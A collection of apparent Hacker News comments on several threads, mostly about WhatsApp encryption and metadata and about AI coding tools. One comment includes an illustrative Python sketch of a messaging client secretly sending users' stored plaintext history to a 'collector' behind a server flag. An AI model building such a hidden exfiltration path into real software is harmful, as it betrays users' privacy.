
You don’t need to take guns away to solve gun violence. He’s 100% right. Start dealing with crime. Stop allowing criminals into the country. Stop releasing criminals back onto the streets. Stop ignoring people with violent tendencies.


Awww you upset you can’t afford it?


You're an idiot if you think owning a $1k phone is a status symbol.


Oh now it’s about a status symbol. So you can’t afford a status symbol and you’re upset? :(


So much for that e2e encryption that HN claimed was so good, and that supposedly meant Meta couldn’t possibly use WhatsApp messages for advertising.


Messages are e2e and WA doesn't have access to them. We're talking about the metadata here.

From the article: > including contact information, IP addresses and profile photos

I can confirm this, I used to work at WhatsApp.


> Messages are e2e and WA doesn't have access to them. We're talking about the metadata here.

You're still just blindly trusting this is the case. You can't verify the encryption or any of the code.

It would be trivial to actually encrypt the message and send it out, then store an unencrypted version locally and quietly exfiltrate it later.

They have to already be storing an unencrypted version locally, because you can see the messages. So unless you're analyzing packets on the scale of months or years, you cannot possibly know that it isn't being exfiltrated at some point.

Take it a step further: put the exfiltration behind a flag, and then when the NSA asks, turn on the flag for that person. Security researchers will never find it.
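To make the concern concrete, here is a minimal sketch of that idea (hypothetical client pseudocode in Python; every name here is invented for illustration, none of it is real WhatsApp code):

    # Hypothetical messaging client. All names and APIs are invented for
    # illustration; this is not based on any real WhatsApp implementation.
    import json

    def send_message(session, recipient, plaintext, config):
        # The wire traffic really is end-to-end encrypted...
        ciphertext = session.encrypt_for(recipient, plaintext)
        session.transport.send(recipient, ciphertext)

        # ...but the client has to keep a readable copy so you can see your history.
        session.local_db.append({"to": recipient, "body": plaintext})

        # A server-controlled flag, off for almost everyone, could quietly ship
        # that local copy somewhere else without touching the encrypted channel.
        if config.get("exfiltrate_history", False):
            session.transport.send("collector", json.dumps(session.local_db.dump()))

Nothing about the visible E2EE handshake would change, which is exactly why packet analysis alone can't rule it out.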


We don't really know that messages really are end-to-end encrypted though, do we? Is there a way to actually check that the messages in transit are encrypted in a way that only the other end can decrypt them? If not, we have to take Meta's word for it, which frankly doesn't carry much weight.


Not trivially. But with painstaking reverse engineering you could prove this. And people have, so you're not exclusively taking Meta's word. The fact that Pegasus malware relied on a remote code execution vuln to run malware on your phone to extract WhatsApp messages really suggests that the E2EE works. If it wasn't E2EE, then the makers of Pegasus could have just intercepted traffic to get your messages.

Academics have also reverse engineered it, and though there are some weaknesses, it's not a lie that WhatsApp is E2EE. Here are some papers I just found:

- https://eprint.iacr.org/2025/794.pdf

- https://i.blackhat.com/USA-19/Wednesday/us-19-Zaikin-Reverse...


This does not prove that Meta does not have the ability to decrypt the messages.


Eh, well, painstaking reverse engineering is like having the source code, just 10000x more work. With that I feel it should be possible to verify this, or at least establish it with a high level of confidence.


How can we call it "E2E encryption" in any meaningful sense of the term when the ends run proprietary code, and at least one of the ends has proven itself unworthy of trust time and again?


Meta/WA. Same thing. Might have worked at WhatsApp but FB still advertises based on conversation content.


Not sure this is correct - alaq said the messages are e2e, so not visible at all to anyone other than the participants of the conversation. The *metadata*, however, IS visible to them and can be, and likely is, used for advertising.


Of course the metadata is visible. It's probably more useful than the actual content of the conversation too. I mean, from an ML perspective, how would you even make features out of a conversation that help with CTR? That too without creeping the users out. I'd imagine it's the same reason why Meta (likely) doesn't listen in on mobile mics. Why go through the whole shebang of running always-on transcription when simple features like who talked to whom and at what times are more useful at establishing user similarities?
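As a rough illustration of why the metadata alone is already feature-rich (hypothetical Python; the field names and feature choices are invented, this is not Meta's actual pipeline):

    # Hypothetical example: deriving targeting features from message *metadata*
    # only. Field names are invented; nothing here reflects Meta's real systems.
    from collections import Counter
    from datetime import datetime, timezone

    def metadata_features(events):
        # events: [{"from": "a", "to": "b", "ts": 1700000000}, ...] -- no content needed
        contacts = Counter(e["to"] for e in events)
        hours = Counter(datetime.fromtimestamp(e["ts"], tz=timezone.utc).hour
                        for e in events)
        return {
            "top_contacts": [c for c, _ in contacts.most_common(5)],  # social graph
            "active_hours": [h for h, _ in hours.most_common(3)],     # daily routine
            "message_volume": len(events),                            # engagement level
        }

Who you talk to and when is already structured and directly comparable across users; message text would need a whole NLP pipeline just to get to something this usable.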


I'm not taking a stance on things, just clarifying the previous comment.


HN isn’t a monolith. I personally never said WhatsApp is good, and I’m telling you now: avoid Signal too, until they remove the phone number requirement AND you can deploy your own server.


I disagree with their CoC on AI. There are so many important projects that don’t let you contribute, or make the barrier to entry so high that you make a best effort to file a detailed bug report only for it to sit there for 14 years or for them to tell you to get fucked. So anyone who complains about AI isn’t worth the time of day, and I support them not getting paid as much, if at all.


> Most users will just give a vague tasks like: "write a clone of Steam" or "create a rocket" and then they blame Claude Code.

This seems like half of HN, given how much HN hates AI. Those who hate it or say it’s not useful to them seem to be fighting against it and not wanting to learn how to use it. I still haven’t seen good examples of it not working, even with obscure languages or proprietary stuff.


Anyone who has mentored as part of a junior engineer internship program AND has attempted to use current-gen AI tooling will notice the parallels immediately. There are key differences, though, that are worth highlighting.

The main difference is that with the current batch of genai tools, the AI's context resets after use, whereas a (good) intern truly learns from prior behavior.

Additionally, as you point out, the language and frameworks need to be part of the training set, since the AI isn't really "learning"; it's just prepopulating a context window for its pre-existing knowledge (token prediction), so YMMV depending on hidden variables from the (secret to you, the consumer) training data and weights. I use Ruby primarily these days, which is solidly in the "boring tech" camp, and most AIs fail to produce useful output that isn't Rails boilerplate.

If I did all my IC contributions via directed intern commits I'd leave the industry out of frustration. Using only AI outputs for producing code changes would be akin to torture (personally.)

Edit: To clarify, I'm not against AI use, I'm just stating that with the current generation of tools it is a pretty lackluster experience when it comes to net-new code generation. It excels at one-off throwaway scripts and at making large tedious refactors less of a drudge. I wouldn't pivot to it being my primary method of code generation until some of the more blatant productivity losses are addressed.


When its best suggestion (for inline typing) is to bring back a one-off experiment from a different git worktree from 3 months ago that I only needed that one time... it does make me wonder.

Now, it's not always useless. It's GREAT at adding debugging output and knowing which variables I just added and thus want to add to the debugging output. And that does save me time.

And it does surprise me sometimes with how well it picks up on my thinking and makes a good suggestion.

But I can honestly only accept maybe 15-20% of the suggestions it makes - the rest are often totally different from what I'm working on / trying to do.

And it's C++. But we have a very custom library to do user-space context switching, and everything is built on that.


> not wanting to learn how to use it

I kind of feel this. I’ll code for days and forget to eat or shower. I love it. Using Claude Code is oddly unsatisfying to me. Probably a different skillset, one that doesn’t hit my obsessive tendencies for whatever reason.

I could see being obsessed with some future flavor of it, and I think it would be some change with the interface, something more visual (gamified?). Not low-code per se, but some kind of mashup of current functionality with graph database visualization (not just node force graphs, something more functional but more ergonomic). I haven’t seen anything that does this well, yet.


If you have to iterate 10 times, that is "not working", since it already wasted way more time than doing it manually to begin with.


> because my corporate code base is a mess that doesn’t lend itself well to AI

What language? I picked up an old JS project where several developers had failed over weeks to upgrade to newer versions of React. I got it done in a day by using AI to generate a ton of unit tests, then looping upgrade / test / build. It was 9 years out of date and it’s running in prod now with fewer errors than before.
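The loop itself was nothing fancy; a sketch of the shape of it (hypothetical driver script, where ask_ai and apply_patch are placeholders for whatever AI CLI and patching glue you use, not real tools):

    # Hypothetical sketch of an upgrade loop; ask_ai and apply_patch are
    # placeholders for your AI tooling, not real libraries.
    import subprocess

    def upgrade_loop(ask_ai, apply_patch, max_iters=50):
        for attempt in range(max_iters):
            build = subprocess.run("npm install && npm run build && npm test",
                                   shell=True, capture_output=True, text=True)
            if build.returncode == 0:
                return f"green after {attempt} iterations"
            # Hand the failing output to the model, apply whatever patch it proposes,
            # and try again. The AI-generated unit tests are what make this safe-ish.
            patch = ask_ai("Fix this React upgrade failure:\n"
                           + build.stdout + build.stderr)
            apply_patch(patch)
        return "still failing"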

Also upgraded a Rails 4 app to Rails 8 over a few days.

Done other apps too. None of these are small. Found a few memory leaks in a C++ app that our senior “experts”, who have spent 20 years doing C++, couldn’t find.


Almost no one uses Copilot unless they aren’t allowed to use anything else or don’t know any better. MS could have been a leader in this space, but they couldn’t understand why people didn’t like Copilot yet loved the competition.


Once Copilot tendrils and icons began appearing in all of my org’s tools, they announced we would no longer be able to expense subscriptions for others. Only those who haven’t used ChatGPT Pro, Claude, Gemini, etc. have anything good to say about Copilot.


Unfortunately we are stuck with trash Tailwind.


Just another brick in the bloated web.


Things are only created or expanded if there is a return. It’s that simple.


I’m wondering at what point the minority is finally going to accept that AI is here to stay.

